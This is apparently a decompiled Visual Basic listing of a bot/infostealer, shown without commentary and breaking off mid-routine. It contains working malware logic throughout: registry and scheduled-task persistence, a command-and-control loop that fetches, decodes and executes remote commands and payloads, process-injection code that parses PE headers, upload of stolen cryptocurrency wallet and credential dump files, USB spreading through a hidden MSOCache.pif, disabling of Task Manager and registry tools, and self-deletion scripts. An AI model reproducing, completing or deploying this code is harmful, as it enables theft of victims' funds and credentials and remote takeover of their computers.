loc_40455A: VarLateMemCallLdVar
loc_404562: CAdVar
loc_404593: Result CInt(GetObject("winmgmts:", var_E4).Count) End Sub 'Integer
End Sub
Public Sub load_param(index, is_encrypted) '4067E8
'Data Table: 401634
Dim var_B0 As Integer
Dim var_AE As Integer
Dim arg_2008 As Variant
Dim var_B4 As Long
Dim var_B8 As Long
loc_4065B0: On Error Resume Next
loc_4065C2: var_B0 = CInt((Len(PARAMS_STORAGE) - &H3C))
loc_4065C5: ' Referenced from: 4065F8
loc_4065DA: If ((LBound(var_A0, 1) + CLng(var_B0)) > UBound(var_A0, 1)) Then
loc_4065F3: var_B0 = CInt(((LBound(var_A0, 1) + CLng(var_B0)) - UBound(var_A0, 1)))
loc_4065F8: GoTo loc_4065C5
loc_4065FB: End If
loc_40660A: For var_C4 = 1 To &H29: var_BC = var_C4 'Long
loc_40661B: If ((&H61 + var_AE) >= &H7B) Then
loc_406622: var_AE = 0
loc_40662D: var_B0 = (var_B0 + 1)
loc_406630: End If
loc_406643: If ((LBound(var_A0, 1) + CLng(var_B0)) > &H7A) Then
loc_40664A: var_B0 = 1
loc_40664D: End If
loc_406679: var_A8 = var_A8 & Chr$((LBound(var_A0, 1) + CLng(var_B0))) & Chr$(CLng((&H61 + var_AE)))
loc_40668D: var_AE = (var_AE + 2)
loc_40669B: If (var_BC < &H29) Then
loc_4066B1: var_A8 = var_A8 & Chr$(&H2C)
loc_4066B7: End If
loc_4066BC: Next var_C4 'Long
loc_4066EE: arg_2008 = Split(var_A8, CVar(Chr$(&H2C)), -1, 0)
loc_4066F8: var_AC = arg_2008
loc_406736: var_B4 = (InStr(1, PARAMS_STORAGE, var_AC(CLng(index)) & Chr$(&H3E), 0) + 3)
loc_40676A: var_B8 = InStr(var_B4, PARAMS_STORAGE, Chr$(&H3C) & var_AC(CLng(index)), 0)
loc_40677F: If (var_B8 <> 0) Then
loc_4067AC: If (Mid$(PARAMS_STORAGE, var_B4, CVar((var_B8 - var_B4))) = "1") Then
loc_4067B5: var_88 = CStr(&HFF)
loc_4067B8: End If
loc_4067BD: If is_encrypted Then
loc_4067CF: var_88 = decrypt(var_88, Me(92))
loc_4067D2: End If
loc_4067D5: Else
loc_4067DD: var_88 = CStr(0)
loc_4067E0: End If
loc_4067E4: Exit Sub
End Sub
Public Sub post_content(file, filename, type) '407344
'Data Table: 401634
Dim var_AC As Variant
Dim var_104 As String
Dim var_D0 As Variant
loc_407103: If ((FileLen(file) > &HA) And get_attribute1(file)) Then
loc_407108: On Error Resume Next
loc_407111: Set var_98 = New
loc_40711B: boundary_id = make_random_string()
loc_407123: If type Then
loc_40715F: var_90 = Mid$(CStr(StrConv(CVar(file_binary_open(file)), &H80, 0)), 2, var_E0)
loc_407175: Else
loc_40717F: var_90 = file_binary_open(file)
loc_407182: End If
loc_4071D2: var_104 = "--" & boundary_id & vbCrLf & "Content-Disposition: form-data; Name=""" & Left$(Me(124), 3) & """; filename="""
loc_40726D: var_AC = StrConv(var_104 & filename & """" & vbCrLf & "Content-Type" & ": file" & vbCrLf & vbCrLf & var_90 & vbCrLf & "--" & boundary_id & "--", &H80, 0)
loc_407289: Set var_138 = var_98
loc_4072A1: var_D0 = False
loc_4072D0: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_24 ("POST", MY_DOMAIN & "?" & Left$(Me(124), 3) & "=1")
loc_407304: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_28 ("Content-Type", "multipart/" & "form-data" & "; boundary=" & boundary_id)
loc_407320: Call {016FE2EC-B2C8-45F8-B23B39E53A75396B}.Method_arg_34 (var_AC)
loc_407329: Set var_138 = Nothing
loc_407334: Set var_98 = Nothing
loc_407337: End If
loc_407342: Result &HFF End Sub 'Integer
End Sub
Public Sub make_persistent(add_schtask) '405B68
'Data Table: 401634
Dim var_A0 As Variant
Dim var_D0 As String
Dim var_C0 As Integer
Dim var_E0 As Boolean
loc_405A08: On Error Resume Next
loc_405A12: If Me(156) Then
loc_405A31: FileCopy Me(88), Me(40) & MY_APPNAME & ".exe"
loc_405A3D: End If
loc_405A44: Set var_90 = WSCRIPT_OBJ
loc_405A4F: If Me(152) Then
loc_405A5D: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String
loc_405A6A: var_D0 = "REG_SZ"
loc_405A73: Call var_90.RegWrite
loc_405A7C: End If
loc_405A83: If Me(154) Then
loc_405A91: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String
loc_405A9E: var_D0 = "REG_SZ"
loc_405AA7: Call var_90.RegWrite
loc_405AB0: End If
loc_405AB7: If Me(158) Then
loc_405AC5: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String
loc_405AD2: var_D0 = "REG_SZ"
loc_405ADB: Call var_90.RegWrite
loc_405AE4: End If
loc_405AEC: If (add_schtask <> &HFF) Then
loc_405AF6: If Me(160) Then
loc_405B30: var_A0 = CVar("schtasks /" & "create /sc ONLOGON /tn " & MY_APPNAME & ".exe" & " /tr " & """" & Me(88) & """") 'String
loc_405B34: var_C0 = 0
loc_405B3A: var_E0 = False
loc_405B42: Call var_90.Run
loc_405B5A: End If
loc_405B5A: End If
loc_405B5E: Set var_90 = Nothing
loc_405B64: Exit Sub
End Sub
Public Sub Proc_0_25_4082A0(arg_C, arg_10, arg_14) '4082A0
'Data Table: 401634
Dim var_124 As Long
Dim var_8C As Long
Dim var_90 As Long
Dim var_98 As Long
Dim var_128 As Long
Dim var_12C As Long
Dim var_94 As Long
loc_407F73: var_F0 = StrConv(arg_C, &H80, 0)
loc_407F80: If (arg_10 = "1") Then
loc_407F88: IStStrCopy
loc_407F8C: End If
loc_407F96: If (Len(arg_14) > 0) Then
loc_407FAA: arg_14 = ChrW$(&H20) & arg_14
loc_407FB1: End If
loc_407FC2: var_124 = VarPtr(var_F0(0))
loc_407FCB: var_8C = var_124
loc_407FE1: If (Proc_0_26_403C5C(var_8C, 2, var_8C) <> &H5A4D) Then
loc_407FE4: Result var_124 End Sub 'Integer
loc_407FE5: End If
loc_407FFC: var_90 = (var_8C + Proc_0_26_403C5C((var_8C + &H3C), 4))
loc_408012: If (Proc_0_26_403C5C(var_90, 4) <> &H4550) Then
loc_408015: Result var_90 End Sub 'Integer
loc_408016: End If
loc_408029: var_98 = Proc_0_26_403C5C((var_90 + &H34), 4)
loc_408039: var_B0(0) = &H44
loc_40804D: var_128 = VarPtr(arg_14)
loc_40805E: var_12C = VarPtr(var_B0(0))
loc_408096: UnknownFunc(VarPtr(arg_10))
loc_4080A7: UnknownFunc(var_CC(0))
loc_4080D2: var_12C = VarPtr(Proc_0_26_403C5C((var_90 + &H50), 4, VarPtr(var_98), var_98, VarPtr(var_98), 0, 0, 0))
loc_4080F3: UnknownFunc(var_CC(0))
loc_408109: var_124 = VarPtr(var_F0(0))
loc_408122: var_128 = Proc_0_26_403C5C((var_90 + &H54), 4, var_124, var_128, 0, var_12C, &H3000, &H40)
loc_40813C: UnknownFunc(var_CC(0))
loc_408162: For var_134 = var_12C To (Proc_0_26_403C5C((var_90 + 6), 2, var_F4, 0, var_98, var_124, var_128, 0) - 1): var_128 = var_134 'Long
loc_40817B: var_94 = ((var_90 + &HF8) + (&H28 * var_F4))
loc_4081BD: var_12C = Proc_0_26_403C5C((var_94 + &H10), 4, Proc_0_26_403C5C((var_94 + &H14), 4, Proc_0_26_403C5C((var_94 + &HC), 4, var_94, var_12C, 4), 0))
loc_4081DF: UnknownFunc(var_CC(0))
loc_4081E7: Next var_134 'Long
loc_4081F9: var_E8(0) = &H10007
loc_408211: UnknownFunc(var_CC(1))
loc_408246: UnknownFunc(var_CC(0))
loc_40826A: var_E8(&H2C) = (4 + Proc_0_26_403C5C((var_90 + &H28), 4, var_98, (var_E8(&H29) + 8), VarPtr(var_98)))
loc_408282: UnknownFunc(var_CC(1))
loc_408295: UnknownFunc(var_CC(1))
loc_40829F: Result &HFF End Sub 'Integer
End Sub
Public Sub Proc_0_26_403C5C
'Data Table: 401634
Dim var_8C As Long
loc_403C40: var_8C = VarPtr(var_88)
loc_403C56: UnknownFunc(-1)
loc_403C5B: Exit Sub
End Sub
Public Sub parse_and_execute_commands(params_str) '409670
'Data Table: 401634
Dim var_D0 As Integer
Dim var_A0 As Variant
Dim var_FC As String
Dim var_B0 As Variant
Dim var_128 As Boolean
loc_408F30: On Error Resume Next
loc_408F6D: var_8C = Trim$(CStr(Split(params_str, "|", -1, 0)(1)))
loc_408F9E: var_90 = "|" & MY_DOMAIN & "|" & Me(128) & "|"
loc_408FAC: test_connection_microsoft()
loc_408FE2: command_id = Split(params_str, "|", -1, 0)(0) 'Variant
loc_408FFA: If (command_id = 0) Then
loc_409002: fingerprint_system(var_8C)
loc_40900A: Else
loc_409017: If (command_id = 1) Then
loc_409036: var_FC = 0
loc_40904C: Proc_0_25_4082A0(process_data(var_8C, 0), "1")
loc_40905F: Else
loc_40906C: If (command_id = 2) Then
loc_409093: module_path = 0 & make_random_string(TEMP_DIR, Right$(var_8C, 3)) & Right$(var_8C, 3)
loc_4090B1: If process_and_write_to_file(var_8C, module_path) Then
loc_4090B9: shell_execute(module_path)
loc_4090BE: End If
loc_4090C1: Else
loc_4090CE: If (command_id = 3) Then
loc_4090E1: module_path = 0 & make_random_string(TEMP_DIR)
loc_40910D: If (LCase$(Right$(var_8C, 4)) = ".vbs") Then
loc_409119: module_path = module_path & ".vbs"
loc_40911F: Else
loc_40912A: module_path = module_path & ".exe"
loc_40912D: End If
loc_409141: If process_and_write_to_file(var_8C, module_path) Then
loc_409158: modify_bot_install(module_path, 0, &HFF)
loc_40915D: End If
loc_409162: Else
loc_40916F: If (command_id = 4) Then
loc_40917F: shell_execute("Explorer " & var_8C, &HFF)
loc_40918A: Else
loc_409197: If (command_id = 5) Then
loc_4091A3: var_B0 = CVar("iexplore " & var_8C) 'String
loc_4091A7: var_D0 = 0
loc_4091AD: var_128 = True
loc_4091B6: Call MemVar_402104.Run
loc_4091C2: Else
loc_4091CF: If (command_id = 6) Then
loc_4091F2: Proc_0_29_4059BC(&HA, CStr(1) & var_90 & var_8C, var_128)
loc_409203: Else
loc_409210: If (command_id = 7) Then
loc_409233: Proc_0_29_4059BC(&HA, CStr(2) & var_90 & var_8C, var_D0)
loc_409244: Else
loc_409251: If (command_id = 8) Then
loc_409274: Proc_0_29_4059BC(&HA, CStr(3) & var_90 & var_8C)
loc_409285: Else
loc_409292: If (command_id = 9) Then
loc_4092AA: Proc_0_29_4059BC(6, 0)
loc_4092B5: Else
loc_4092C2: If (command_id = 10) Then
loc_4092CC: If UnknownFunc(var_B0) Then
loc_4092DB: If get_attribute1(OFF_C) Then
loc_4092EA: Kill OFF_C
loc_4092F2: Else
loc_409306: write_to_file(OFF_C, 0)
loc_40931A: Kill HOSTS_PATH
loc_40931F: End If
loc_409321: End If
loc_409326: Else
loc_409333: If (command_id = 11) Then
loc_409342: If get_attribute1(POS_PATH) Then
loc_409349: Me(168) = 0
loc_409355: kill_task(POS_EXE)
loc_409366: Kill OUTPUT_TXT
loc_409377: Kill POS_PATH
loc_40937F: Else
loc_409385: Me(168) = &HFF
loc_40938A: End If
loc_40938F: Else
loc_40939C: If (command_id = 12) Then
loc_4093A1: Proc_0_31_4046A4(0)
loc_4093A9: Else
loc_4093B6: If (command_id = 13) Then
loc_4093FA: write_to_file(MY_DIR & "email.txt", process_data(MY_DOMAIN & "?u=" & "0", &HFF))
loc_409417: Proc_0_29_4059BC(7, 0)
loc_409422: Else
loc_40942F: If (command_id = 14) Then
loc_40943F: Proc_0_29_4059BC(8, var_8C)
loc_409447: Else
loc_409454: If (command_id = 15) Then
loc_409464: Proc_0_29_4059BC(9, var_8C)
loc_40946C: Else
loc_409479: If (command_id = 16) Then
loc_409487: shutdown_or_reboot("1")
loc_409492: Else
loc_40949F: If (command_id = 17) Then
loc_4094AD: shutdown_or_reboot("0")
loc_4094B8: Else
loc_4094C5: If (command_id = 18) Then
loc_4094CA: End
loc_4094CF: Else
loc_4094D4: var_A0 = 19
loc_4094DC: If (command_id = 19) Then
loc_4094EC: DeleteSetting("L!NK", var_A0, var_D0)
loc_40950B: modify_bot_install("1", 0, &HFF)
loc_409516: Else
loc_409523: If (command_id = 20) Then
loc_40953F: Proc_0_29_4059BC(&HE, CStr(1) & var_90)
loc_40954E: Else
loc_40955B: If (command_id = 21) Then
loc_40957E: Proc_0_29_4059BC(&HE, CStr(2) & var_90 & var_8C)
loc_40958F: Else
loc_40959C: If (command_id = 22) Then
loc_4095BF: Proc_0_29_4059BC(&HE, CStr(3) & var_90 & var_8C)
loc_4095D0: Else
loc_4095DD: If (command_id = 23) Then
loc_4095ED: Proc_0_29_4059BC(&HF, var_90)
loc_4095F5: Else
loc_409602: If (command_id = 24) Then
loc_409617: Proc_0_29_4059BC(&HF, CStr(1))
loc_409622: Else
loc_40962F: If (command_id = 25) Then
loc_409652: Proc_0_29_4059BC(&HE, CStr(4) & var_90 & var_8C)
loc_409663: Else
loc_409667: Exit Sub
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_409668: End If
loc_40966C: Exit Sub
End Sub
Public Sub cnc_post_and_read
'Data Table: 401634
Dim var_98 As Variant
Dim var_C8 As Boolean
Dim var_EC As Variant
loc_405520: On Error Resume Next
loc_40552A: Set conn_obj = MSXML_OBJ
loc_405530: var_98 = "POST"
loc_40553F: var_C8 = False
loc_405547: Call conn_obj.Open
loc_40554F: var_98 = "User-Agent"
loc_405561: Call conn_obj.SetRequestHeader
loc_405569: var_98 = "Content-Type"
loc_405578: Call conn_obj.SetRequestHeader
loc_40558E: var_EC = CVar(var_98 & Proc_0_9_4040BC(Me(12), "application/x-www-form-urlencoded", var_98, Me(128))) 'String
loc_405595: Call conn_obj.Send
loc_4055F3: If CBool((conn_obj.StatusText <> "OK") Or (InStr(1, conn_obj.ResponseText, CVar(ChrW$(&H3C)), 0) <> 0)) Then
loc_4055F8: Exit Sub
loc_4055F9: End If
loc_405612: If (Len(conn_obj.ResponseText) > 3) Then
loc_40562D: parse_and_execute_commands(base64_decode(CStr(conn_obj.ResponseText), conn_obj.ResponseText, var_C8), MY_DOMAIN)
loc_40563C: End If
loc_405640: Set conn_obj = Nothing
loc_405646: Exit Sub
End Sub
Public Sub Proc_0_29_4059BC(arg_C, arg_10) '4059BC
'Data Table: 401634
Dim var_98 As String
Dim var_8C As Long
loc_405854: On Error Resume Next
loc_405881: var_88 = process_data(MY_DOMAIN & "?p=" & CStr(arg_C), 0)
loc_405898: If (arg_C = &HB) Then
loc_4058AD: var_98 = MY_APPNAME & ".exe" & "|"
loc_4058CA: Proc_0_25_4082A0(var_88, SYSTEM32_DIR & "wscript.exe")
loc_4058DD: Else
loc_4058F8: If Proc_0_25_4082A0(var_88, "1", arg_10) Then
loc_405906: If (arg_C = 6) Then
loc_405910: var_8C = 0
loc_405925: ssc_file = MY_DIR & "ss" & ".c"
loc_40592B: ' Referenced from: 4059AD
loc_405936: If (var_8C <= 4) Then
loc_405943: If get_attribute1(ssc_file, var_8C) Then
loc_405973: If post_content(ssc_file, Proc_0_49_404F40(6, var_98 & Me(88))) Then
loc_405980: Kill ssc_file
loc_405985: End If
loc_405987: GoTo loc_4059B0
loc_40598D: Else
loc_405996: Sleep(&H3E8)
loc_4059A6: var_8C = (var_8C + 1)
loc_4059A9: End If
loc_4059AD: GoTo loc_40592B
loc_4059B0: ' Referenced from: 405987
loc_4059B0: End If
loc_4059B0: End If
loc_4059B2: End If
loc_4059B4: End If
loc_4059B8: Exit Sub
End Sub
Public Sub Proc_0_30_4060D8
'Data Table: 401634
Dim var_9C As Long
Dim var_92 As Integer
Dim var_86 As Integer
loc_405F48: On Error Resume Next
loc_405F5A: For index = 0 To 5: _index = index 'Long
loc_405F77: filename = APPDATA_DIR & CStr(_index) & ".c"
loc_405F88: var_9C = 0
loc_405FB5: var_8C = process_data(MY_DOMAIN & "?p=" & CStr(_index), 0, &HFF)
loc_405FCC: If (_index = 2) Then
loc_405FD3: var_92 = &HFF
loc_405FD6: End If
loc_40600D: If Proc_0_25_4082A0(var_8C, "1", "/stext " & """" & filename & """") Then
loc_406010: ' Referenced from: 406079
loc_40601B: If (var_9C <= 4) Then
loc_406028: If get_attribute1(filename, var_92) Then
loc_406045: post_content(filename, Proc_0_49_404F40(_index, var_9C))
loc_406053: GoTo loc_40607C
loc_406059: Else
loc_406062: Sleep(&H3E8)
loc_406072: var_9C = (var_9C + 1)
loc_406075: End If
loc_406079: GoTo loc_406010
loc_40607C: ' Referenced from: 406053
loc_40607C: End If
loc_40607C: End If
loc_406085: var_8C = 0
loc_40608C: var_92 = 0
loc_40608F: ' Referenced from: 4060B4
loc_406099: If get_attribute1(filename, var_92, var_9C) Then
loc_4060A6: Kill filename
loc_4060AD: DoEvents()
loc_4060B4: GoTo loc_40608F
loc_4060B7: End If
loc_4060BC: Next index 'Long
loc_4060C8: If steal_wallets() Then
loc_4060CF: var_86 = &HFF
loc_4060D2: End If
loc_4060D4: Result var_86 End Sub 'Integer
End Sub
Public Sub Proc_0_31_4046A4
'Data Table: 401634
loc_4045FE: If get_attribute1(LOGNAME) Then
loc_40460A: kill_task("dwn.exe")
loc_404617: Sleep(&H3E8)
loc_404626: SetAttr DWN_EXE, 0
loc_404635: Kill LOGNAME
loc_404644: Kill KEYS_C
loc_404653: Kill DWN_EXE
loc_404662: Kill WIN_C
loc_40466A: Else
loc_40469A: If process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HC), LOGNAME) Then
loc_40469D: Proc_0_32_4051F0(0)
loc_4046A2: End If
loc_4046A2: End If
loc_4046A2: Exit Sub
End Sub
Public Sub Proc_0_32_4051F0
'Data Table: 401634
loc_4050E4: On Error Resume Next
loc_40510C: var_88 = decrypt(file_binary_open(LOGNAME))
loc_405128: var_94 = MY_DOMAIN & "?u=" & CStr(2)
loc_40513E: Kill KEYS_C
loc_40514F: UnknownFunc(var_94)
loc_405173: var_90 = process_data(var_94, &HFF, 0)
loc_40519B: If ((Len(var_90) > 4) And (InStr(1, var_90, ",", 0) <> 0)) Then
loc_4051A8: write_to_file(WIN_C, var_90, StrConv(var_94, vbUnicode))
loc_4051AD: End If
loc_4051B9: FileCopy Me(88), DWN_EXE
loc_4051CA: SetAttr DWN_EXE, 6
loc_4051E4: Proc_0_25_4082A0(var_88, DWN_EXE, 0)
loc_4051EE: Exit Sub
End Sub
Public Sub steal_wallets
'Data Table: 401634
Dim var_2A0 As Variant
Dim var_290 As Variant
Dim var_278 As Variant
loc_407740: On Error Resume Next
loc_407752: ReDim _arr(0 To &H1B)
loc_407769: _arr(0) = "MultiBit"
loc_407778: _arr(1) = "Armory"
loc_407787: _arr(2) = "Electrum"
loc_407796: _arr(3) = "digital"
loc_4077A5: _arr(4) = "-LTC"
loc_4077B4: _arr(5) = "MultiDoge"
loc_4077C3: _arr(6) = "BitcoinDark"
loc_4077D2: _arr(7) = "Unobtanium"
loc_4077E1: _arr(8) = "Dash"
loc_4077F0: _arr(9) = "Bit"
loc_4077FF: _arr(&HA) = "Lite"
loc_40780E: _arr(&HB) = "Name"
loc_40781D: _arr(&HC) = "PP"
loc_40782C: _arr(&HD) = "Feather"
loc_40783B: _arr(&HE) = "Nova"
loc_40784A: _arr(&HF) = "Prime"
loc_407859: _arr(&H10) = "Terra"
loc_407868: _arr(&H11) = "Dev"
loc_407877: _arr(&H12) = "Anon"
loc_407886: _arr(&H13) = "Pay"
loc_407895: _arr(&H14) = "World"
loc_4078A4: _arr(&H15) = "Quark"
loc_4078B3: _arr(&H16) = "Infinite"
loc_4078C2: _arr(&H17) = "Doge"
loc_4078D1: _arr(&H18) = "Asic"
loc_4078E0: _arr(&H19) = "Lotto"
loc_4078EF: _arr(&H1A) = "Dark"
loc_4078FE: _arr(&H1B) = "Mona"
loc_407912: mArr = Array(_arr) 'Variant
loc_407923: CRefVarAry
loc_40792A: For index = 0 To UBound(mArr, 1): _index = index 'Long
loc_40793B: If (_index = 4) Then
loc_407966: var_2A0 = mArr(2) & mArr(_index)
loc_40796E: VarIndexSt
loc_40797B: End If
loc_407986: If (_index > 8) Then
loc_4079A7: var_290 = mArr(_index) & "coin"
loc_4079AF: VarIndexSt
loc_4079BA: End If
loc_4079D4: var_290 = CVar(APPDATA_DIR) & mArr(_index)
loc_4079E2: var_8C = CStr(var_290 & "\")
loc_4079FD: If Proc_0_14_403F14(var_8C, 0, mArr, var_290, _index) Then
loc_407A0E: var_278 = CVar(var_8C & "*.wallet") 'String
loc_407A16: var_90 = Dir(var_278, 0)
loc_407A1C: ' Referenced from: 407AAB
loc_407A24: If CBool(Len(var_90)) Then
loc_407A7B: post_content(var_8C & var_90, CStr(var_278 & "_" & CVar(VOL_SERIAL) & "-" & CVar(var_90)), 0, mArr(_index))
loc_407AA3: var_90 = Dir(var_278, 0)
loc_407AAB: GoTo loc_407A1C
loc_407AAE: End If
loc_407AAE: End If
loc_407AB5: Next index 'Long
loc_407AC3: Result &HFF End Sub 'Integer
End Sub
Public Sub process_data(arg_C, to_b64, to_encrypt) '40580C
'Data Table: 401634
Dim var_A8 As Long
Dim var_98 As Long
Dim var_BA As Integer
Dim var_92 As Integer
Dim var_A4 As String
loc_4056A4: On Error Resume Next
loc_405700: var_A4 = arg_C
loc_40570C: var_A8 = UnknownFunc(UnknownFunc(Me(128)))
loc_40571A: var_98 = var_A8
loc_405739: res_str = String$(&H1000, CVar(Chr$(&H30)))
loc_405741: ' Referenced from: 4057A7
loc_405750: var_A4 = res_str
loc_40575C: var_BA = UnknownFunc(var_98)
loc_40576D: var_92 = CBool(var_BA)
loc_405783: If ((var_9C = 0) Or Not(var_92)) Then
loc_405788: GoTo loc_4057AA
loc_40578B: End If
loc_40579B: var_A4 = Left$(res_str, var_9C)
loc_40579F: var_8C = var_8C & var_A4
loc_4057A7: GoTo loc_405741
loc_4057AA: ' Referenced from: 405788
loc_4057B6: If (Len(var_8C) <> 0) Then
loc_4057BE: If to_encrypt Then
loc_4057D7: var_88 = decrypt(var_8C, Proc_0_19_404CD8(var_8C, var_92, StrConv(res_str, vbUnicode), var_A4, var_BA, var_A4, Len(res_str)), var_9C, var_98, StrConv(arg_C, vbUnicode))
loc_4057E0: Else
loc_4057E7: If to_b64 Then
loc_4057F4: var_88 = base64_decode(var_8C, var_A4, var_A8)
loc_4057FA: Else
loc_4057FF: var_88 = var_8C
loc_405802: End If
loc_405802: End If
loc_405804: End If
loc_405808: Exit Sub
End Sub
Public Sub file_binary_open(filename) '403E94
'Data Table: 401634
loc_403E54: On Error Resume Next
loc_403E60: Open filename For Binary As 1 Len = &HFF
loc_403E72: var_8C = Space$(LOF(1))
loc_403E81: Get 1, 0, var_8C
loc_403E87: Close 1
loc_403E8E: var_88 = var_8C
loc_403E93: Exit Sub
End Sub
Public Sub write_to_file(filename, content) '404158
'Data Table: 401634
loc_4040F8: On Error Resume Next
loc_404107: If (Len(content) < &H400) Then
loc_404113: Open filename For Output As 1 Len = &HFF
loc_40411E: Print 1, content
loc_404128: Close 1
loc_40412D: Else
loc_404138: Open filename For Binary As 1 Len = &HFF
loc_404148: Put 1, 0, content
loc_40414E: Close 1
loc_404150: End If
loc_404154: Exit Sub
End Sub
Public Sub shell_execute(arg_C) '403C08
'Data Table: 401634
Dim var_9C As Double
loc_403BE8: On Error Resume Next
loc_403BFF: var_9C = Shell(arg_C, 0)
loc_403C04: Exit Sub
End Sub
Public Sub shutdown_or_reboot(arg_C) '403E14
'Data Table: 401634
loc_403DE0: If (arg_C = "1") Then
loc_403DE6: var_88 = "r"
loc_403DEC: Else
loc_403DEF: var_88 = "s"
loc_403DF2: End If
loc_403E04: shell_execute("shutdown -t 0 -" & var_88 & " -f")
loc_403E10: Exit Sub
End Sub
Public Sub process_and_write_to_file(content, filename) '403DA8
'Data Table: 401634
Dim var_86 As Integer
loc_403D68: On Error Resume Next
loc_403D7D: arg_C = process_data(content, 0)
loc_403D8D: If (Len(arg_C) > 0) Then
loc_403D98: write_to_file(filename, content)
loc_403DA1: var_86 = &HFF
loc_403DA4: End If
loc_403DA6: Result var_86 End Sub 'Integer
End Sub
Public Sub Proc_0_40_40628C(arg_C, arg_10) '40628C
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_118 As Long
Dim var_11C As Long
Dim var_15C As String
loc_406130: If (Len(arg_C) > 8) Then
loc_406140: var_8C = Left$(var_8C, 8)
loc_406143: End If
loc_40614F: var_124 = MemVar_40B3A4.App
loc_40615F: var_118 = App.hInstance
loc_40616A: If CBool(var_118) Then
loc_406178: CopyMemory(var_CC, var_118, &H40)
loc_406185: If (var_CC = 23117) Then
loc_406197: CopyMemory(var_E4, (var_118 + var_90), &H18)
loc_4061A6: If (var_E4 = &H4550) Then
loc_4061CD: For var_130 = 0 To CLng((var_DE - 1)): var_120 = var_130 'Long
loc_4061E7: CopyMemory(Record Of arg_109, var_114, (((var_118 + var_90) + &H18) + CLng(var_D0)))
loc_406200: var_15C = arg_109
loc_406211: var_114 = var_15C
loc_406223: If (Left$(var_15C, Len(var_8C)) = var_8C) Then
loc_406260: CopyMemory(CStr(String(var_104, CVar(Chr$(0)))), (var_118 + var_100), var_104)
loc_406271: Exit For
loc_406274: End If
loc_40627D: var_11C = (var_11C + &H28)
loc_406283: Next var_130 'Long
loc_406288: ' Referenced from: 406271
loc_406288: End If
loc_406288: End If
loc_406288: End If
loc_406288: Exit Sub
End Sub
Public Sub modify_bot_install(arg_C, copy_bot, arg_14, kill_bot) '4076EC
'Data Table: 401634
Dim var_A0 As Variant
Dim var_B4 As String
Dim var_D0 As Integer
Dim var_F0 As Boolean
loc_407404: On Error Resume Next
loc_40740C: If copy_bot Then
loc_40741B: FileCopy Me(88), MY_APPNAME
loc_407427: shell_execute(MY_APPNAME)
loc_407434: If Not(Me(162)) Then
loc_407439: Exit Sub
loc_40743A: End If
loc_40743A: End If
loc_407441: If kill_bot Then
loc_40744F: kill_task("dwn.exe")
loc_407462: kill_task("wscript.exe")
loc_407471: kill_task(POS_EXE)
loc_40748D: Kill CVar(Me(40) & MY_APPNAME & ".exe")
loc_4074A4: Kill HOSTS_PATH
loc_4074B5: Kill OUTPUT_TXT
loc_4074C6: Kill POS_PATH
loc_4074D0: var_B4 = "0"
loc_4074DF: disable_tskmgr_regtools("0")
loc_4074FF: disable_tskmgr_regtools("1", "0")
loc_407512: Set _wscript = WSCRIPT_OBJ
loc_407521: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\" & MY_APPNAME) 'String
loc_407528: Call _wscript.RegDelete
loc_40753C: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\run\" & MY_APPNAME) 'String
loc_407543: Call _wscript.RegDelete
loc_407557: var_A0 = CVar("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & MY_APPNAME) 'String
loc_40755E: Call _wscript.RegDelete
loc_40758E: var_A0 = CVar("schtasks /" & "end /tn " & """" & MY_APPNAME & ".exe" & """") 'String
loc_407592: var_D0 = 0
loc_407598: var_F0 = False
loc_4075A0: Call _wscript.Run
loc_4075B8: Set _wscript = Nothing
loc_4075BC: End If
loc_4075D5: filename = var_A0 & make_random_string(TEMP_DIR, var_F0, var_D0, var_A0) & ".cmd"
loc_4075EF: If ((Len(arg_C) > 1) Or arg_14) Then
loc_4075FB: command = "ping -n 4 127.0.0.1 > nul" & vbCrLf
loc_4075FE: End If
loc_407603: If arg_14 Then
loc_40762D: command = command & "rd /q /s " & """" & "\\.\" & MY_DIR & """"
loc_40763E: Else
loc_40765E: command = command & "del /F " & """" & Me(88) & """"
loc_40766A: End If
loc_407676: If (Len(arg_C) > 1) Then
loc_407690: command = command & vbCrLf & "start " & arg_C
loc_40769A: End If
loc_4076D5: write_to_file(filename, command & vbCrLf & "del /F " & """" & filename & """", var_A0)
loc_4076DF: shell_execute(filename, var_A0)
loc_4076E6: End
loc_4076EA: Exit Sub
End Sub
Public Sub Proc_0_42_408E68
'Data Table: 401634
Dim var_C0 As Variant
Dim var_B0 As Variant
Dim var_F8 As Variant
Dim var_118 As Variant
Dim var_108 As Variant
Dim arg_2008 As Variant
Dim var_1A8 As String
Dim var_128 As Variant
Dim var_1B8 As String
loc_408800: On Error Resume Next
loc_40880F: CAdVar
loc_40881B: For Each var_98 In MemVar_402104.drives
loc_408862: If CBool(var_98.isready And (var_98.freespace > 0) And (var_98.drivetype = 1)) Then
loc_40888A: FileCopy Me(88), CStr(var_98.Path & "\" & "MSOCache.pif")
loc_4088CD: If get_attribute1(CStr(var_98.Path & "\" & "MSOCache.pif")) Then
loc_4088FA: SetAttr CStr(var_98.Path & "\" & "MSOCache.pif"), 6
loc_40890B: End If
loc_40891A: var_C0 = var_98.Path & "\"
loc_408924: LateMemCallLdVar
loc_408932: CAdVar
loc_408946: For Each var_9C In MemVar_402104.Files
loc_408972: If CBool(InStr(1, var_9C.Name, ".", 0)) Then
loc_4089A8: arg_2008 = Split(CStr(var_9C.Name), ".", -1, 0)
loc_4089B2: var_90 = arg_2008
loc_4089DD: If (LCase$(var_90(UBound(var_90, 1))) <> "lnk") Then
